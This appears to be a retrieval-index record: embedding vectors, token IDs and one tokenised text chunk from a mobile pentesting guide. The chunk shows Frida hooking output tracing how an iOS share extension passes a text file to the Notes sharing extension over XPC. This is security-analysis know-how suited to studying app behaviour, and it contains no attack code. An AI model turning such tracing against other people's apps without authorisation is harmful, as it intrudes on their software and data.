-0.3355497121810913, 0.02770591713488102, 0.608513355255127, -0.7739056944847107, -0.5122592449188232, -0.2442874163389206, 0.19765950739383698, 0.35128942131996155, -0.09306519478559494, 0.7326929569244385, -0.6662980914115906, 0.3146388828754425, -0.044576797634363174, -0.5730262994766235, -0.33752310276031494, -0.4158083200454712, -0.04769172891974449, -0.5914431810379028, 0.7145799398422241, 0.44418400526046753, 0.267652302980423, -0.3281792104244232, -0.8223981261253357, -0.12859836220741272, 0.7780664563179016, -0.2720666825771332, -0.15330767631530762, 0.06860025227069855, 0.35120025277137756, 0.4547699987888336, 0.7447624206542969, 0.028218334540724754, -0.3727262020111084, 0.1085834726691246, -0.051520898938179016, 0.5253248810768127, -0.6642115712165833, -0.4617101550102234, 0.19288860261440277, -0.18034426867961884, -0.029550541192293167, 0.2356811761856079, -0.7775886058807373, 0.0414220467209816, -0.2011212259531021, 0.4210847318172455, 0.3177804946899414, -0.2922828197479248, 0.6430882215499878, -0.23806212842464447, -0.9430975914001465, 0.27606698870658875, 0.7869527339935303, -0.14176777005195618, -0.24436087906360626, -0.1896229386329651, 0.17805080115795135, 0.4529111683368683, -0.24136000871658325, 0.3073108494281769, -0.0802365243434906, -0.09339121729135513, -0.11055787652730942, -0.6458474397659302, 0.8500741720199585, 0.024311736226081848, 0.6152516603469849, -0.7086068987846375, -0.41424596309661865, 0.07670091092586517, 0.03412434458732605, 0.6795786023139954, 0.3190588057041168, 0.5518486499786377, -0.22171109914779663, -0.4235730767250061, 0.045853614807128906, -0.5989305973052979, -0.7641029357910156, -0.028154805302619934, -0.1527802050113678, 0.18500438332557678, -0.01426940318197012, 0.9370242357254028, -0.37636151909828186, -0.17580978572368622, 0.22864930331707, 0.031726446002721786, 0.13557933270931244, -0.8221009969711304, -0.7365176677703857, -0.47206780314445496, 0.12353595346212387, 0.24378825724124908, -0.4656897783279419, -0.2175752818584442, 0.15504617989063263, -0.04475773498415947, 0.36204200983047485, 0.3720002770423889, -0.492496132850647, -0.4297522306442261, 0.5361796021461487, 0.6825675964355469, -0.325711190700531, 0.002823658287525177, 0.3713638186454773, -0.33285465836524963, -0.23974363505840302, -0.2031480222940445, -0.2050655633211136, -0.47203874588012695, -0.6442056894302368, -0.12799067795276642, -0.10944482684135437, 0.047429125756025314, -0.05463787540793419, -0.06724613159894943, 0.2851014733314514, 0.4416380822658539, -0.17828655242919922, -0.2381337583065033, -0.17779554426670074, -0.22664415836334229, 0.12620867788791656, -0.03951196372509003, -0.2184237539768219, -0.7356287837028503, -0.13520899415016174, -0.44504839181900024, 0.6517902612686157, 0.009330936707556248, 0.10994282364845276, -0.08836233615875244, -0.5627538561820984, 0.26754119992256165, 0.1034705862402916, 0.08494842797517776, -0.24271079897880554, 0.5209701061248779, -0.1306457817554474, -0.14312459528446198, 0.3450942933559418, -0.48667624592781067, 0.42704418301582336, -0.2543067932128906, -0.37267255783081055, -0.4455016553401947, -0.037237148731946945, -0.7969383001327515, -0.09856139868497849, 0.8162069320678711, -0.8594053387641907, -0.4413124620914459, -0.8916088342666626, 0.8332453370094299, 0.2126256227493286, -0.2329871952533722, -1.1258044242858887, 0.443487286567688, -0.23433305323123932, -0.6615644693374634, 0.3463694453239441, 0.13629662990570068, -0.19041389226913452, -0.20420663058757782, 0.3152824938297272, 0.49779343605041504, -0.5891638398170471, 0.12847189605236053, 1.1268773078918457, -0.41777193546295166, -0.20870333909988403, -0.8522974252700806, 0.2608695924282074, 0.17302806675434113, -0.15913890302181244, 0.021034421399235725, -0.7089173197746277, -0.21810142695903778, -0.198035329580307, -0.6350999474525452, 0.3166222870349884, 0.054728180170059204, -0.3949902057647705, 0.34457388520240784, -0.2835712432861328, 0.6377567648887634, 0.30234241485595703, -0.7576428055763245, -0.11272820830345154, 0.04833846166729927, -0.11262732744216919, -0.35369741916656494, 0.27975067496299744, 0.43658825755119324, -0.1051289290189743, -0.26021602749824524, 0.22468683123588562, -0.38637688755989075, -0.14972013235092163, 0.7376112937927246, -0.1168351024389267, -0.9715738892555237, 0.5338436365127563, 0.48448267579078674, -1.0765548944473267, 0.19717969000339508, -0.24065400660037994, -0.3129918575286865, 0.27505606412887573, -0.3881951868534088, -0.46574294567108154, 0.5602510571479797, 0.332363486289978, 0.19897645711898804, 0.5049587488174438, 0.24456611275672913, -0.36220723390579224, 0.19564597308635712, 0.8546484708786011, 0.08912282437086105, 0.6402519941329956, 1.3739216327667236, -0.42270442843437195, -0.39279434084892273, -0.3167038857936859, -0.6351384520530701, 0.018395112827420235, -0.1704450100660324, 0.9954480528831482, -0.6516417264938354, 0.018920212984085083, 0.0530221052467823, -0.3228205740451813, 0.7393454909324646, -0.272926926612854, 0.09593323618173599, 1.282599687576294, -0.33632171154022217, -0.2093825340270996, -0.5802955627441406, 0.20121817290782928, -0.15712545812129974, -0.16758517920970917, -0.5715916752815247, -0.041031256318092346, 0.17206983268260956, -0.09959927201271057, 0.6110144257545471, -1.019307017326355, -0.8214713335037231, -0.7015826106071472, -0.17855636775493622, -0.15957856178283691, -0.015412021428346634, -0.01988750509917736, 0.48550739884376526, 0.2143295556306839, -0.43035510182380676, -0.5472123026847839, 0.5918566584587097, -0.4387630522251129, 0.2336369752883911, -0.28920862078666687, 0.48714742064476013, -0.1077176108956337, -0.3855208158493042, -0.18342411518096924, -0.811795711517334, -0.4721044600009918, -0.8179118633270264, 0.02761305309832096, -0.2791876792907715, -0.8543774485588074, 0.07356061786413193, 0.37624168395996094, 0.05663152411580086, -0.17537863552570343, -0.3094269037246704, 0.20308339595794678, 0.7795543074607849, -0.35953766107559204, -0.37665122747421265, 0.15809841454029083, 0.13190221786499023, 0.09569332748651505, -0.05735047534108162, -0.5176110863685608, -0.6149308085441589, -0.0876767635345459, 0.5602763891220093, 0.37810131907463074, -0.3428206145763397, -0.0324743390083313, -0.20670093595981598, -0.4159831404685974, -0.32269778847694397, 0.003902589436620474, -0.1775413453578949, 0.10874690115451813, -0.27846962213516235, 0.08795372396707535, 0.652855396270752, 0.6979387998580933, 1.1386603116989136, -0.7525191307067871, 0.5403144359588623, 0.6991755366325378, 0.4137853682041168, 0.0677461251616478, -0.10040692985057831, 0.03936658054590225, -0.3339879810810089, -0.43557825684547424, 0.10004189610481262, -0.10417602211236954, 0.7915913462638855, -0.14968669414520264, 0.1773916631937027, -0.3930216133594513, 0.4267835021018982, 0.004123928025364876, 0.023744937032461166, 0.43421924114227295, 0.04430607706308365, 0.465871125459671, -0.3511757552623749, -0.40426671504974365, -0.08450306206941605, -0.45463088154792786, -0.025807274505496025, 0.42575734853744507, 0.1914505660533905, -0.25328484177589417, 0.25716114044189453, -0.14561854302883148, 0.0021016045939177275, 0.433982253074646, 0.03464388847351074, 0.018964964896440506, 0.2846977710723877, -0.8016728162765503, 1.3348984718322754, -0.3306840658187866, -0.1714281290769577, -0.6462475061416626, 0.46572184562683105, -1.005061388015747, -0.6491425037384033, 0.6298705339431763, 0.3364614248275757, 0.11742472648620605, -0.0824667289853096, -1.0080814361572266, 0.0021983105689287186, 0.6125487089157104, -0.06800089031457901, -0.16957132518291473, 0.31142374873161316, 0.0021286653354763985, 0.0318048819899559, -0.3302256464958191, 0.06486845016479492, -0.20171768963336945, -0.3602565824985504, 0.3004888892173767, 0.2780141234397888, 0.44223752617836, 0.49147292971611023, -0.10495259612798691, -0.15312905609607697, 0.6948896050453186, 0.7469256520271301, 0.781664252281189, -0.26090145111083984, 0.5171619653701782, -0.06468740105628967, -0.12374863028526306, 0.04795995354652405, -0.01523329596966505, -0.47204652428627014, 0.15529045462608337, 0.42251133918762207, -0.3843141794204712, 0.030181152746081352, 0.9148192405700684, 0.12955240905284882, -0.392564594745636, 0.09904000908136368, -0.35237735509872437, 0.4685498774051666, 0.023941142484545708, 0.016134783625602722, 0.10879486799240112, -0.06743629276752472, -0.43776097893714905, -0.15499402582645416, -0.3969706892967224, 0.43641024827957153, -0.9107624292373657, 0.4382512867450714, -0.5840785503387451, 0.629982054233551, 0.2545759379863739, 0.3197265565395355, -0.4570736587047577, 0.8859978914260864, 0.8943620324134827, -0.20746751129627228, -0.2349676638841629, 0.1137755811214447, -0.17380541563034058, 0.23136548697948456, 0.11933603137731552, -0.340333491563797, -0.6619061231613159, 0.5525404214859009, 0.060424819588661194, -0.7473856210708618, -0.1531517505645752, 0.12794402241706848, 0.1127404272556305, 0.40444740653038025, -0.025759587064385414, -0.3769516348838806, -0.15400706231594086, -0.36997443437576294, 0.24894927442073822, -0.7420327067375183, 0.07695396989583969, 0.4451441168785095, -0.5596225261688232, -0.058296769857406616, 0.6363784670829773, -0.3546547293663025, 0.8283202648162842, 0.009224094450473785, 0.6566769480705261, -0.7172508239746094, 0.2794764041900635, 0.4659779369831085, -0.5826987028121948, -0.5872408747673035, -0.07041843980550766, -0.36380499601364136, -0.4878910481929779, 0.17754966020584106, -0.43746787309646606, 1.0135838985443115, 0.18785318732261658, 0.11126253008842468, -0.17364057898521423, -0.07334904372692108, -0.5218445062637329, -0.572433352470398, 0.04514024034142494, 0.015001107007265091, -0.3940196633338928, 0.0004770848318003118, 0.2147478610277176, -0.13617737591266632, 0.48540687561035156, -0.8368950486183167, -1.1177401542663574, -0.9423364400863647, 0.06987645477056503, -0.5206910371780396, 1.1627553701400757, -0.3061097264289856, -0.4525375962257385, 0.14239846169948578, -0.7454941272735596, -0.7789692282676697, -0.3982466757297516, -0.26639583706855774, -0.628143310546875, 0.6112438440322876, -0.04776116833090782, 0.5865193605422974, 0.3282802700996399, -0.4166826903820038, -0.5355940461158752, 0.6794877648353577, 0.7944484353065491, -0.015646593645215034, 0.7408152222633362, 0.3862973153591156, 0.5887290835380554, 0.25994056463241577, 0.08200415968894958, 0.5976201295852661, -0.1131720170378685, -0.1999550312757492, -0.6117311120033264, -0.37568017840385437, -0.9473520517349243, -0.3114679157733917, 0.13210132718086243, 0.02241801843047142, 0.4005167782306671, 0.13347458839416504, -1.2189527750015259, -0.37474119663238525, -0.7614783048629761, -0.07253580540418625, -0.0035779436584562063, 0.10801810026168823, 0.38196030259132385, 0.08147235959768295, 0.47486257553100586, -1.1285163164138794, 4.547489166259766, 0.599939227104187, -0.25700584053993225, -0.14402338862419128, -0.13965898752212524, 0.5338097810745239, 1.4969607591629028, -0.5131202340126038, 0.5333774089813232, -0.2983767092227936, 0.5311513543128967, 0.29314854741096497, 0.16486921906471252, 0.24618637561798096, 0.19048969447612762, 0.4451266825199127, -0.2585095763206482, 0.5317530632019043, 0.07665880769491196, -0.9506826400756836, -0.751623272895813, -0.11220679432153702, -0.4344366788864136, 0.6554543375968933, 0.4941944181919098, 0.16348691284656525, -0.13273070752620697, -0.4124302864074707, -0.08599551022052765, -0.2847353518009186, -0.46804681420326233, -0.5098138451576233, 0.2395039051771164, -0.6775115728378296, -0.5861343741416931, 0.43485167622566223, -0.06803923845291138, -1.5410451889038086, -0.14662136137485504, 0.3052189350128174, -0.0861549898982048, 0.16026200354099274, -0.10491936653852463, -0.021412044763565063, 0.2749876379966736, 0.09616853296756744, 0.018076887354254723, 0.18115001916885376, 0.39288294315338135, -0.8944159150123596, 0.5389121174812317, -0.2563718855381012, 0.9366697669029236, -0.4691544473171234, -0.27920714020729065, -0.1460319310426712, 0.6780977845191956, -0.3149331510066986, 0.20250026881694794, 0.04092034325003624, 0.5451095104217529, -0.5139135122299194, 0.10347667336463928, -0.3227232098579407, -0.5996679663658142, 0.31167370080947876, -0.5975883603096008, 0.6858227849006653, -0.011438630521297455, -0.040105972439050674, -0.16593003273010254, -0.10129670053720474, -0.32560494542121887, -0.08012989163398743, 0.12200503051280975, -0.6451786756515503, -0.39182111620903015, 0.49442362785339355, 0.6180462837219238, -0.5500266551971436, 0.08501303195953369, -0.4399664103984833, -0.7419482469558716, 0.14299213886260986, 1.0551944971084595, 0.9725772738456726, -0.259941965341568, -0.8052248358726501, 0.08501555025577545, 0.33379679918289185, 0.022476304322481155, -0.45807042717933655, -0.15383733808994293, 0.24763524532318115, -0.06728056073188782 ]
[ 7076, 5051, 11873, 1996, 5167, 2108, 4207, 29278, 2023, 2057, 2323, 8103, 24978, 10288, 29048, 8663, 18209, 1011, 7953, 4221, 5244, 1999, 1996, 2951, 14802, 10439, 1012, 2206, 1996, 3025, 2742, 1997, 23921, 2057, 2097, 2085, 2224, 1996, 1000, 3745, 1000, 6462, 2006, 1037, 3793, 5371, 1006, 2008, 2001, 2363, 2013, 1037, 11834, 1007, 2000, 3443, 1037, 3602, 1999, 1996, 3964, 10439, 2007, 2009, 1024, 2065, 2057, 2448, 1037, 7637, 1010, 2057, 1005, 1040, 2156, 1996, 2206, 6434, 1024, 1006, 1014, 2595, 2487, 2278, 2692, 2575, 10322, 20958, 2692, 1007, 24978, 10288, 29048, 8663, 18209, 1011, 7953, 4221, 5244, 2692, 2595, 15136, 22407, 23777, 24087, 2278, 3192, 999, 1011, 1031, 24978, 10288, 29048, 1035, 8875, 21572, 17258, 2121, 29278, 4502, 8516, 10441, 2094, 1024, 5331, 8663, 18209, 1024, 1033, 1014, 2595, 15136, 22407, 22932, 2581, 2050, 2549, 3192, 999, 1011, 1031, 24978, 10288, 29048, 1035, 7170, 4221, 2213, 29278, 4502, 8516, 10441, 2094, 1024, 6123, 5178, 16778, 8873, 2121, 1024, 6503, 11774, 3917, 1024, 1033, 1014, 2595, 15136, 24594, 2581, 16703, 18827, 3192, 999, 1035, 1035, 24978, 2595, 15042, 8663, 2638, 7542, 1035, 2003, 1035, 4214, 1035, 2041, 1035, 2000, 1035, 15612, 1035, 4874, 1035, 1055, 2509, 1035, 1035, 1014, 2595, 15136, 24594, 2581, 16147, 2575, 2620, 3192, 999, 1011, 1031, 24978, 2595, 15042, 8663, 2638, 7542, 1035, 21933, 3207, 5685, 2378, 6767, 3489, 7834, 3736, 3351, 24415, 18697, 3372, 1024, 9245, 1024, 1033, 1014, 2595, 15136, 22907, 18139, 2620, 14142, 3192, 999, 4471, 1035, 28213, 2692, 2595, 15136, 2487, 6305, 22907, 2094, 2692, 5622, 2497, 2595, 15042, 1012, 1040, 8516, 12322, 999, 1035, 26726, 2278, 1035, 4434, 1035, 2655, 1035, 2724, 1035, 28213, 2692, 2595, 15136, 2487, 6305, 24096, 2575, 2620, 5622, 2497, 2595, 15042, 1012, 1040, 8516, 12322, 999, 1035, 26726, 2278, 1035, 4434, 1035, 24532, 1035, 2724, 1012, 1012, 1012, 2128, 2102, 1024, 1006, 1000, 1026, 24978, 10288, 29048, 4221, 2213, 1024, 1014, 2595, 2487, 2278, 20958, 2692, 2050, 27009, 2692, 1028, 1011, 5310, 2378, 14876, 1024, 1063, 24978, 10288, 29048, 4221, 18900, 2696, 22729, 17140, 2100, 1027, 1006, 1000, 1026, 24978, 4221, 8737, 12298, 18688, 1024, 1014, 2595, 2487, 2278, 21472, 2497, 14142, 2063, 2692, 1028, 1063, 4127, 1027, 1006, 1032, 1050, 1032, 1000, 2270, 1012, 5810, 1011, 3793, 1032, 1000, 1010, 1032, 1050, 1032, 1000, 2270, 1012, 5371, 1011, 24471, 2140, 1032, 1000, 1032, 1050, 1007, 1065, 1000, 1007, 1025, 1065, 1000, 1007, 2182, 2057, 2064, 11949, 2008, 1024, 2023, 4158, 2104, 1011, 1996, 1011, 7415, 3081, 26726, 2278, 1010, 5509, 2135, 2009, 2003, 7528, 3081, 1037, 24978, 2595, 15042, 8663, 2638, 7542, 2008, 3594, 1996, 5622, 2497, 2595, 15042, 1012, 1040, 8516, 12322, 7705, 1012, 1996, 21183, 2483, 2443, 1999, 1996, 24978, 4221, 8737, 12298, 18688, 2024, 2270, 1012, 5810, 1011, 3793, 1998, 2270, 1012, 5371, 1011, 24471, 2140, 1010, 1996, 3732, 2108, 2443, 1999, 24978, 10288, 29048, 18908, 25761, 6820, 2571, 2013, 1996, 18558, 1012, 20228, 2923, 1997, 1996, 1000, 3745, 5331, 1000, 1997, 23921, 1012, 12151, 1996, 10439, 14305, 2920, 29337, 2064, 2036, 2424, 2041, 2029, 10439, 5331, 2003, 2635, 2729, 1997, 2115, 1996 ]
hack_tricks
434.txt
3
requests and responses by hooking nsextension - _ plugin : we run the same example again : ( 0x1c0370200 ) nsextension - _ pluginret : < pkplugin : 0x1163637f0 ph. telegra. telegraph. share ( 5. 3 ) 5b6de177 - f09b - 47da - 90cd - 34d73121c7851 ( 2 ) / private / var / containers / bundle / application / 15e6a58f - 1ca7 - 44a4 - a9e0 - 6ca85b65fa35 / telegram x. app / plugins / share. appex > ( 0x1c0372300 ) - [ nsextension _ plugin ] ret : < pkplugin : 0x10bff7910 com. apple. mobilenotes. sharingextension ( 1. 5 ) 73e4f137 - 5184 - 4459 - a70a - 83f90a1414dc 1 ( 2 ) / private / var / containers / bundle / application / 5e267b56 - f104 - 41d0 - 835b - f1dab9ae076d / mobilenotes. app / plugins / com. apple. mobilenotes. sharingextension. appex > as you can see there are two app extensions involved : share. appex is sending the text file ( public. plain - text and public. file - url ). com. apple. mobilenotes. sharingextension. appex which is receiving and will process the text file. if you want to learn more about what's happening under - the - hood in terms of xpc, we recommend to take a look at the internal calls from " libxpc. dylib ". for example you can use frida - trace and then dig deeper into the methods that you find more interesting by extending the automatically generated stubs. mobile pentesting - [SEP]
[ 0.45341843366622925, -0.010958021506667137, 0.7396690249443054, 0.6943493485450745, -0.01135081797838211, 0.12848874926567078, -0.5030578970909119, -0.1359802484512329, 0.6899594068527222, 1.1059315204620361, -0.3845920264720917, 0.8257180452346802, 0.6447948217391968, -0.5730052590370178, 0.021156063303351402, -0.10466399788856506, 0.2605992555618286, -0.47184354066848755, 0.42180296778678894, 0.06088448315858841, 0.0623198039829731, -0.5266360640525818, -1.2339098453521729, -0.5335186123847961, -0.26588642597198486, -0.2412949502468109, 0.1299860030412674, -0.046202853322029114, 1.1221500635147095, 0.6106474995613098, -0.5072471499443054, 0.4944566786289215, 0.3048316538333893, -0.45972198247909546, -0.02750318869948387, -0.5205375552177429, 0.5203298330307007, -0.44053423404693604, -0.5399631857872009, -0.8610920310020447, -0.6472386717796326, 0.0012847216567024589, 0.8503676056861877, -0.5719214081764221, -0.5428487062454224, -0.517664909362793, -0.4774239957332611, 0.3626503646373749, -0.5046703815460205, -0.6674560904502869, -0.007302895188331604, 0.3043270409107208, 0.043927013874053955, -0.1615016758441925, 0.2572806477546692, 0.1318291872739792, -0.7251622676849365, -0.5929655432701111, -0.6000710725784302, 0.2653893232345581, -0.32154932618141174, -0.09817618876695633, -0.18246233463287354, -0.7094689607620239, 0.15450631082057953, 0.46489500999450684, -0.5794001817703247, -0.7383989095687866, -0.23275458812713623, -0.9219731092453003, 0.07298801094293594, 0.3501404821872711, -0.44329962134361267, -0.42265748977661133, -0.158574640750885, 0.041021138429641724, -0.027114063501358032, -0.2138262689113617, 0.1050749272108078, 1.0846648216247559, -0.11878714710474014, 0.5350417494773865, 0.11813374608755112, -0.13475464284420013, -0.4944402873516083, -0.563971221446991, 0.4118974506855011, -0.8451268672943115, -0.13274936378002167, -0.006475172005593777, 0.09586148709058762, 0.2518903315067291, -0.5272904634475708, -0.28629934787750244, 0.15853974223136902, 0.9519489407539368, -0.10113006830215454, 0.13749219477176666, -0.023732053115963936, 0.5116968750953674, 1.0032477378845215, -0.06001688167452812, -0.1419306844472885, 0.230562224984169, -0.27167317271232605, 0.6922373175621033, 0.1018272191286087, 0.0891716331243515, -1.1818324327468872, -0.6048294901847839, -0.7169212102890015, -0.05838232859969139, -0.04104524850845337, -0.3895900845527649, 0.12134499102830887, 0.1301746964454651, 0.3570637106895447, -0.4333707094192505, -0.6823921799659729, 0.16810622811317444, 0.0713634118437767, -0.04910770803689957, -0.1374092996120453, -0.4432604908943176, 0.12602007389068604, -0.020082002505660057, 0.06489447504281998, 0.9754015803337097, -0.8310156464576721, -0.0056349472142755985, 0.28999578952789307, -0.22523115575313568, 0.37093642354011536, 0.6115555763244629, 0.21551570296287537, 0.04644503444433212, 0.2947441637516022, -0.049663517624139786, 0.6986871957778931, -0.7498838305473328, 0.22330716252326965, -0.14854034781455994, -0.1550062596797943, 1.2004491090774536, 0.2954323887825012, 0.14108654856681824, -0.2093639075756073, -1.0998632907867432, -1.1089345216751099, 0.04363730549812317, 0.11442781984806061, 0.4969002902507782, -0.11902597546577454, -0.09545457363128662, -0.06644415855407715, -0.11003673821687698, -0.6380490660667419, 0.05986601114273071, 0.5372930765151978, 0.3967426121234894, 0.16128526628017426, 1.0175421237945557, -0.5416382551193237, 0.9210708141326904, -0.33354851603507996, 0.22547903656959534, -0.7884224653244019, -0.3481493592262268, 0.16041752696037292, 0.1995876282453537, 0.20705729722976685, 0.26479852199554443, -0.44128426909446716, 0.3615119159221649, 0.9715375900268555, -0.2959137260913849, 0.28149542212486267, -0.05604248493909836, 0.12693233788013458, 0.2682081460952759, 0.15383590757846832, 0.6852535009384155, 0.7299625873565674, 0.4629090428352356, -0.029945459216833115, 0.17760717868804932, -0.06837276369333267, 0.2810486853122711, -0.21801398694515228, -0.39135944843292236, -0.08364856988191605, 0.6373774409294128, -0.2867330312728882, 0.6947306990623474, -0.08454791456460953, 0.48344704508781433, -0.6675095558166504, -0.6280365586280823, -0.15222012996673584, -0.3544690012931824, -0.5187667608261108, 0.5276780724525452, -0.5643302202224731, 0.8136560320854187, -0.7495904564857483, -0.3198451101779938, 0.5702986121177673, 0.7297343611717224, 0.3597498834133148, 0.42345115542411804, 0.8535006642341614, 0.562971830368042, -0.934430718421936, 0.1322648972272873, 0.28623872995376587, -0.6227224469184875, 0.16224201023578644, 0.2650826573371887, 0.2240869551897049, 0.43592870235443115, -0.21949781477451324, 0.7027355432510376, 0.8041926026344299, -0.10599561035633087, -0.14729999005794525, -0.5357086658477783, 0.2401072084903717, 0.03646538406610489, -0.5421283841133118, 0.7567933797836304, -0.18397817015647888, 0.41958364844322205, -0.23870527744293213, 1.0568225383758545, 0.18916669487953186, 0.48216187953948975, 0.6751056909561157, 0.17278040945529938, 0.4770860970020294, -0.2696887254714966, -0.18228255212306976, 0.36532843112945557, -0.2887161374092102, 0.34039536118507385, 0.6318765878677368, 0.07230007648468018, 0.15671145915985107, -0.1580585092306137, 0.49852418899536133, 0.7914206385612488, -1.2917557954788208, 0.7787423729896545, 0.8044683933258057, 0.5554726123809814, -0.08023283630609512, -0.342040091753006, 0.5694499015808105, 0.536095380783081, -0.2672811448574066, -0.38556984066963196, 0.7499753832817078, -0.048170581459999084, -0.4869784116744995, 0.21318846940994263, 0.0384577177464962, 0.38606515526771545, 0.21989697217941284, -0.14891356229782104, -0.5387263894081116, -1.207577109336853, -0.19031809270381927, -0.29850396513938904, -1.2141335010528564, 0.023323066532611847, -0.8512676954269409, 0.17942897975444794, 0.857895016670227, -0.13818688690662384, 0.009830288589000702, -0.4713332951068878, 1.0790317058563232, 0.05729701742529869, 0.051546987146139145, 0.12139858305454254, -0.12169183045625687, -0.028676487505435944, -1.0528796911239624, 0.09137924760580063, -0.4277297854423523, 0.9006708860397339, -0.6905030012130737, 0.8627232909202576, 0.11810358613729477, -0.3054468035697937, 0.455667108297348, -0.7841862440109253, -0.00022886334045324475, 0.30345800518989563, -0.29662880301475525, 0.5656830668449402, 0.04132647439837456, -0.2081526815891266, -0.029417840763926506, -0.21937966346740723, -0.2722674310207367, 1.119452714920044, 0.5752708911895752, -0.12420038878917694, 0.7158000469207764, 0.08764754980802536, 0.312154620885849, 0.17325104773044586, 0.08560360968112946, 0.17628061771392822, -0.3869251608848572, 0.9533247947692871, 0.8215820789337158, -0.21137379109859467, 0.21679487824440002, -0.3602582514286041, -0.8849239349365234, 0.01088093314319849, -0.3687010109424591, -0.4314489960670471, 0.08295293152332306, 0.44874444603919983, 0.12804746627807617, -0.6745154857635498, 0.57368004322052, -0.9133365154266357, -0.3990478515625, 0.33549803495407104, -0.31696611642837524, 0.6142740249633789, -0.25764235854148865, 0.6063394546508789, -0.5241416692733765, -0.4040101170539856, 0.20511141419410706, -0.36636680364608765, -0.01371866837143898, -0.2889961898326874, -0.12706267833709717, -0.38883018493652344, -0.6004579067230225, -0.3001571595668793, -0.3974720239639282, -0.833807647228241, 0.16198106110095978, -0.28520113229751587, 0.03748953714966774, -0.21633999049663544, 0.15982991456985474, -0.04160245507955551, -0.010450473986566067, 1.1407499313354492, -0.08830529451370239, 0.1231054738163948, -0.012874240055680275, -0.056567978113889694, -0.12040930986404419, -0.16950549185276031, 0.16492372751235962, 0.13149584829807281, 0.3790765702724457, -0.6151139140129089, 0.055106021463871, 0.6377981901168823, 0.34130048751831055, -0.38947802782058716, 0.08494333177804947, -0.26001453399658203, -0.2081873118877411, 0.7058231830596924, -0.5531750917434692, -0.5915055871009827, 0.686015784740448, 0.18994638323783875, 0.64461350440979, -0.4965801239013672, 0.10460507869720459, -0.006494114175438881, 0.3560906648635864, 0.7675599455833435, -0.2792341113090515, 0.11752891540527344, -0.9127029180526733, -0.22086960077285767, -0.16855061054229736, -0.29575127363204956, 0.15236294269561768, 0.21169888973236084, 0.4115666151046753, -0.19673563539981842, -1.1601746082305908, -0.5960748791694641, 0.04034178704023361, 0.383486807346344, 0.36741048097610474, 0.5976008772850037, 0.4486357569694519, 0.33323177695274353, 0.09725926071405411, 0.10515323281288147, -0.6536687016487122, -0.10477106273174286, -0.5102549195289612, 0.6336740255355835, -0.080316461622715, 0.2906871438026428, -0.5546252727508545, -0.5214914679527283, 0.00802292674779892, 0.23632827401161194, -0.2558920979499817, 0.28971725702285767, -0.5735236406326294, -0.08395997434854507, 0.6506072878837585, 0.14049243927001953, -0.262716680765152, -0.5909069180488586, -0.2452179491519928, 0.2804248631000519, 0.7717752456665039, -0.3010160028934479, 0.5479902029037476, -0.353008508682251, -0.543327808380127, 0.27318811416625977, -0.1967751383781433, 0.08406618237495422, -0.6919355392456055, -0.37060317397117615, -0.8739596009254456, 1.1346007585525513, 0.7944615483283997, 0.07733557373285294, -0.4358474612236023, -0.5429795384407043, -0.030306700617074966, 0.6435254812240601, 0.1183318942785263, -0.05278158187866211, -0.07130066305398941, 0.15277411043643951, 1.2483384609222412, 0.244209885597229, 0.13490509986877441, -0.19985996186733246, 0.6177040934562683, -0.7129865884780884, 0.5879682302474976, -0.45867884159088135, -0.7158543467521667, 0.3819468319416046, 0.3425832688808441, -0.016121383756399155, 0.46626394987106323, -0.24809563159942627, 0.32265663146972656, 0.30183422565460205, 0.5264574885368347, 0.6230073571205139, -0.4247988164424896, 0.6393213868141174, -0.10822557657957077, -0.4543789327144623, 0.19948163628578186, 0.2887949049472809, -0.21523964405059814, 0.19187113642692566, 0.0923340916633606, 0.25332310795783997, 0.7592758536338806, 0.3647039234638214, 0.45475757122039795, 0.06710081547498703, -0.3657950758934021, 0.06813417375087738, -0.7141187191009521, 0.7009581327438354, -0.367608904838562, 0.2537791132926941, -0.727442741394043, -0.3943421542644501, 0.24805349111557007, -0.5227523446083069, 0.19020038843154907, 0.5193993449211121, 0.4534580111503601, -0.12530870735645294, -0.12464794516563416, -0.3725002706050873, -1.1155246496200562, -0.5358067750930786, -0.31204652786254883, -0.7326805591583252, 0.43508005142211914, 0.3951815068721771, 0.92298823595047, -0.6280635595321655, -0.3027423024177551, 0.3972616493701935, -0.4170042872428894, -0.10197749733924866, -0.6887267827987671, -0.057130005210638046, 0.19698889553546906, 0.24980302155017853, -0.16235019266605377, 0.007116870954632759, 0.42547449469566345, -0.01628611981868744, 0.05488574504852295, 0.33515846729278564, 0.5010627508163452, -0.2707574963569641, -0.28501665592193604, 0.39516276121139526, 0.49643224477767944, -0.648114025592804, -0.6530687808990479, 0.3708837628364563, -0.7608874440193176, 0.3032057285308838, 0.627960205078125, -0.7807561755180359, -0.5672865509986877, -0.4258759617805481, -0.058769941329956055, -0.5760226845741272, -0.3363501727581024, -0.4181254208087921, -0.014802595600485802, -0.03625306487083435, 0.6704838871955872, 0.20367176830768585, -0.5005285739898682, 0.14932972192764282, -0.3196723759174347, 0.17444254457950592, -0.47735652327537537, 0.3916454315185547, -0.8377302289009094, 0.5174251794815063, -0.3754551112651825, 0.6307923197746277, -0.11033020168542862, 0.059992581605911255, -0.5520355701446533, 0.07177895307540894, 0.7616685628890991, 0.47950848937034607, -0.6407440304756165, -0.4789087474346161, 0.10426519066095352, -0.19282765686511993, -0.3873865008354187, 0.753870964050293, -0.7315241694450378, 0.5466809868812561, -0.3043251633644104, 0.062049951404333115, -0.5522119402885437, 0.07586490362882614, -0.9523965716362, 0.6052635908126831, 0.36608514189720154, -1.0347354412078857, 0.43597081303596497, -0.11210014671087265, 0.193193256855011, -0.3823452591896057, 0.4103407561779022, -1.5063146352767944, 0.5360351800918579, -0.6715684533119202, -0.37888196110725403, 0.40032312273979187, -0.16563670337200165, -0.6375476717948914, 0.15125058591365814, 0.18556460738182068, 0.30506184697151184, -0.7353797554969788, 0.3342755436897278, 1.5142743587493896, -0.6284452676773071, 0.06682275235652924, -0.7384325265884399, 1.4741336107254028, 0.3206064701080322, -0.6818459630012512, -0.0759194865822792, -0.35873910784721375, 0.3438572287559509, -0.308919757604599, -0.2666061520576477, -0.11978013068437576, -0.8138899207115173, -0.3085120916366577, 0.4064078629016876, 0.003942184150218964, 0.9703158736228943, 0.17624104022979736, -0.5907650589942932, -0.12388037890195847, 0.13889119029045105, 0.028557270765304565, 0.2576543688774109, 0.588826060295105, 0.3982256352901459, 0.8058686256408691, -0.08954344689846039, -1.0186700820922852, -0.4424164593219757, -0.9329866766929626, 0.6631307601928711, -0.16586820781230927, -0.34039583802223206, 0.5669302344322205, 1.0763219594955444, -0.1929319053888321, -0.6201077103614807, -0.09524568170309067, 0.21999284625053406, -0.3913690149784088, -0.43573063611984253, 0.13152293860912323, 0.19130340218544006, -0.6017677783966064, 0.013874093070626259, 0.25280845165252686, 